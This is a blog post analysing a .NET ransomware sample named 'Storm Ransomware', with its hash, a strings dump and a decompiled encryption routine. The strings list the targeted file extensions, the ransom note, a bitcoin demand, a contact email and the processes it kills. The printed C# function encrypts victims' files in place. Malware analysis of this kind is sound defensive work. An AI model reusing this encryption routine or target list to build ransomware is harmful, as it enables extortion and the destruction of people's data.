Sunday, July 30, 2017

Storm Ransomware:

Today we are analysing a malware sample and its hash is 791b700810e356339066b67f2f4febc9089b5541d602946a243dfb15e6f3918e. It is referred as storm ransomware sample.

Storm Ransomware
The sample is compiled with .net compiler. Here is the snapshot of the .net compiler detected in that file. Reversing that code is very much possible. Let's try on that.
.net compiled
Interesting strings presence:

0000000052EF   0000004070EF      0   Property can only be set to Nothing
000000005337   000000407137      0   WinForms_RecursiveFormCreate
000000005371   000000407171      0   WinForms_SeeInnerException
0000000053CF   0000004071CF      0   .accdb
0000000053E7   0000004071E7      0   .aepx
00000000547B   00000040727B      0   .class
0000000054FD   0000004072FD      0   .docb
000000005509   000000407309      0   .docm
000000005515   000000407315      0   .docx
00000000552B   00000040732B      0   .dotm
000000005537   000000407337      0   .dotx
000000005593   000000407393      0   .idml
0000000055A9   0000004073A9      0   .indb
0000000055B5   0000004073B5      0   .indd
0000000055C1   0000004073C1      0   .indl
0000000055CD   0000004073CD      0   .indt
0000000055ED   0000004073ED      0   .java
0000000055F9   0000004073F9      0   .jpeg
000000005623   000000407423      0   .m3u8
000000005693   000000407493      0   .mpeg
00000000578F   00000040758F      0   .potm
00000000579B   00000040759B      0   .potx
0000000057A7   0000004075A7      0   .ppam
0000000057C7   0000004075C7      0   .ppsm
0000000057D3   0000004075D3      0   .ppsx
0000000057E9   0000004075E9      0   .pptm
0000000057F5   0000004075F5      0   .pptx
000000005801   000000407601      0   .prel
00000000580D   00000040760D      0   .prproj
0000000058A3   0000004076A3      0   .sldm
0000000058AF   0000004076AF      0   .sldx
000000005965   000000407765      0   .xlam
000000005999   000000407799      0   .xlsb
0000000059A5   0000004077A5      0   .xlsm
0000000059B1   0000004077B1      0   .xlsx
0000000059C7   0000004077C7      0   .xltm
0000000059D3   0000004077D3      0   .xltx
000000005A0F   00000040780F      0   Label1
000000005A1E   00000040781E      0   _______________________________________________________________________________________
000000005ACE   0000004078CE      0   Button1
000000005AE4   0000004078E4      0   Microsoft Sans Serif
000000005B0E   00000040790E      0   Label2
000000005B1C   00000040791C      0   Storm Ransomware
000000005B3E   00000040793E      0   RichTextBox1
000000005B5A   00000040795A      0   Label3
000000005B68   000000407968      0   Send mony to my bitcoin :
000000005B9C   00000040799C      0   Label5
000000005BB2   0000004079B2      0   Label6
000000005BC0   0000004079C0      0   Contact Me : 
000000005BDC   0000004079DC      0   Button2
000000005BF6   0000004079F6      0   TextBox1
000000005C08   000000407A08      0   Form1
000000005C22   000000407A22      0   taskmgr.exe
000000005C3A   000000407A3A      0   ProcessHacker.exe
000000005C5E   000000407A5E      0   FullName
000000005C82   000000407A82      0   Hassan
000000005C90   000000407A90      0   HassanAmiri
000000005CA8   000000407AA8      0   Winrar
000000005CB7   000000407AB7      0   Hello You Are Hacked Now !! All your personal files have been encrypted ! if you want restore your data you have to pay ! Remember you can't restore your data without our decryptor !!!!
000000005E2B   000000407C2B      0   ertyuioppoiuhygtfrdeRFTGYHDEZEFFZEF
000000005E73   000000407C73      0   StormRansomware(at)gmail(dot)com

This list of strings give more details about the file extension or file types targeted by the storm ransomware. And it also give the details on functioning buttons like send moeny to my bitcoin, contact me. It also shown the email id - StormRansomware(at)gmail(dot)com.
Possibly email id and password details will be there. We disassembled the code and please refer the following snapshots of the code:

Email id and password details
Process detail
The following code snippet is regards to the cryptography related stuffs:
public static void EC(string nombre, string password)
{
byte[] array = new byte[32];
Encoding.Default.GetBytes(password).CopyTo(array, 0);
RijndaelManaged rijndaelManaged = new RijndaelManaged
{
Mode = CipherMode.CBC,
KeySize = 256,
BlockSize = 256,
Padding = PaddingMode.Zeros
};
byte[] array2 = File.ReadAllBytes(nombre);
MemoryStream memoryStream = new MemoryStream();
try
{
CryptoStream cryptoStream = new CryptoStream(memoryStream, rijndaelManaged.CreateEncryptor(array, array), CryptoStreamMode.Write);
try
{
cryptoStream.Write(array2, 0, array2.Length);
byte[] array3 = memoryStream.ToArray();
byte[] array4 = new byte[checked(array3.Length - 1 + 1)];
array3.CopyTo(array4, 0);
File.WriteAllBytes(nombre, array4);
}

Conclusion:
Currently top AV vendors are detecting this variant. And the famous detection name is MSIL crypter.

Post made by
at
Labels:

No comments:

Post a Comment

Subscribe to: Post Comments (Atom)

Operating system - Part 1:

 In our blog, we published several articles on OS concepts which mostly on the perspective for malware analysis/security research. In few in...